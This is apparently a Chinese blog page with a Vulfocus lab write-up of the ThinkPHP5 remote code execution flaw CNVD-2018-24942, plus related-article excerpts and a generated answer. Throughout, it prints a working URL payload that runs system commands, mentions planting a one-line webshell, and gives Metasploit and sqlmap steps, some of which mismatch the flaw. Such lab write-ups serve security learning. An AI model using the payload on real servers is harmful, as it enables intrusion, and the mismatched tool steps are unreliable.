vulfocus——thinkphp代码执行(CNVD-2018-24942)

最新推荐文章于 2024-10-18 11:31:49 发布
原创 最新推荐文章于 2024-10-18 11:31:49 发布 · 811 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #servlet #junit

本文探讨了ThinkPHP5存在的远程代码执行漏洞,该漏洞源于控制器名的检测不足,允许攻击者通过特定payload执行任意系统命令。攻击者可以利用此漏洞获取敏感信息,如在靶场环境中通过构造不同的payload进行命令执行,包括读取文件和写入一句话木马。为防止此类攻击,开发者需要及时更新和加固框架,确保应用的安全性。

描述

ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。

 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

复现

1.打开靶场环境

2.构造payload远程代码执行,在地址后边添加路径与参数就行,然后在/tmp下获得flag

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=想要输入的命令

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20

最低0.47元/天 解锁文章
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1803
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
ThinkPHP5远程代码执行CNVD-2018-24942
ANOrange的博客
04-03 908
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具
vulfocus靶场thinkphp命令执行cve-2018-1002015
没有故事
04-21 981
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。
thinkphp 代码执行 (CNVD-2018-24942)
博客地址 www.sec0nd.top
07-14 690
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。远程代码执行,读取当前目录 本来想试试上传一句话木马的,网站有点拉跨一直在转圈,好像写不进去根据之前的经验,flag在tmp目录下,就直接拿flag了 使用composer安装,并且一直保持最新版本使用的话,使用下面的指令更新到最新版本即可...
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5792
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
CNVD-2018-24942漏洞复现
尼德霍格007
07-15 1129
CNVD-2018-24942漏洞复现 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 开始 打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法 远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1
thinkphp-2x-rce 代码执行
yzl_007的博客
09-19 472
thinkphp-2x-rce 代码执行 打开环境 漏洞描述 ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。 在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = pre
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1889
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
12-18
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.   然而近期th
vulfocus thinkphp-3.2.x
A1bewhy的博客
03-23 4296
readme 1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com) 2、.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日) 3、重开了几次环境,所以截图混乱,但是步骤和方法可行 4、如果解题过程1不可行,可尝试解题过程2 解题过程1 1、访问网址,抓包,改数据包 2、访问\Application\Runtime\Logs\Common\yy_mm_dd.log(其中,yy为年,mm为月,dd为日) 3、构造请求攻击 htt
[Vulfocus解题系列]ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942
00勇士王子的博客
07-04 1336
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本 ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 解题过程 1.开启靶场环境 2.在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&am
ThinkPHP5代码执行的简单分析
aixuan9365的博客
12-13 567
漏洞影响版本: ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1.0-5.1.30 漏洞复现:   一.mac的debug环境搭建。     一键化环境搭建工具: mamp pro ,调试工具 PHPstorm     打开mamp pro,设置左上角的file->Edit Template, 设置httpd.conf (监听本地) ...
thinkphp-cnvd 2018 24942
Z_l123的博客
03-01 876
影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 1.访问地址 2.远程代码执行 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd 3.上传一句话木马 ?s=index/\think\tem
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2673
thinkphp-命令执行】日志包含
Vulfocus通关---thinkphp3.2.x 代码执行
RanQ的博客
09-15 829
vulfocus的tp漏洞通关小白手把手教程
记录一次漏洞复现--thinkphp5远程代码执行漏洞cnvd-2018-24942
banliyaoguai的博客
10-18 351
在地址中添加如下路径与参数。安装vulfocus
CNVD-2018-24942thinkphp使用工具如何查找flag
最新发布
12-12
CNVD-2018-24942是针对ThinkPHP框架的一个漏洞,攻击者可以通过该漏洞执行任意代码。为了查找flag(即标志,通常指在渗透测试中需要找到的特定文件或信息),可以使用一些常见的渗透测试工具,如SQLMap、Metasploit等。 以下是一些步骤和工具使用方法: ### 步骤一:确认漏洞存在 首先,需要确认目标系统是否存在CNVD-2018-24942漏洞。可以通过发送特定的HTTP请求来测试: ```http http://target.com/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ``` 如果目标系统返回PHP信息页面,则说明漏洞存在。 ### 步骤二:使用Metasploit进行攻击 Metasploit是一个强大的渗透测试框架,可以利用该漏洞进行攻击: 1. 启动Metasploit: ```bash msfconsole ``` 2. 搜索ThinkPHP漏洞模块: ```bash search thinkphp ``` 3. 选择合适的模块并配置: ```bash use exploit/multi/http/thinkphp_unserialize_exec set RHOST target.com set RPORT 80 set TARGETURI /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ``` 4. 执行攻击: ```bash run ``` ### 步骤三:查找flag 一旦获取到系统的shell,可以通过以下命令查找flag: ```bash find / -name "flag*" 2>/dev/null ``` 或者查看常见的flag文件路径: ```bash cat /var/www/html/flag.txt ``` ### 步骤四:使用SQLMap进行SQL注入 如果漏洞涉及到SQL注入,可以使用SQLMap进行自动化测试: 1. 启动SQLMap: ```bash sqlmap -u "http://target.com/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" --dbs ``` 2. 查找数据库中的flag: ```bash sqlmap -u "http://target.com/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" -D database_name -T table_name --dump ``` 通过以上步骤,可以尝试查找目标系统中的flag。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值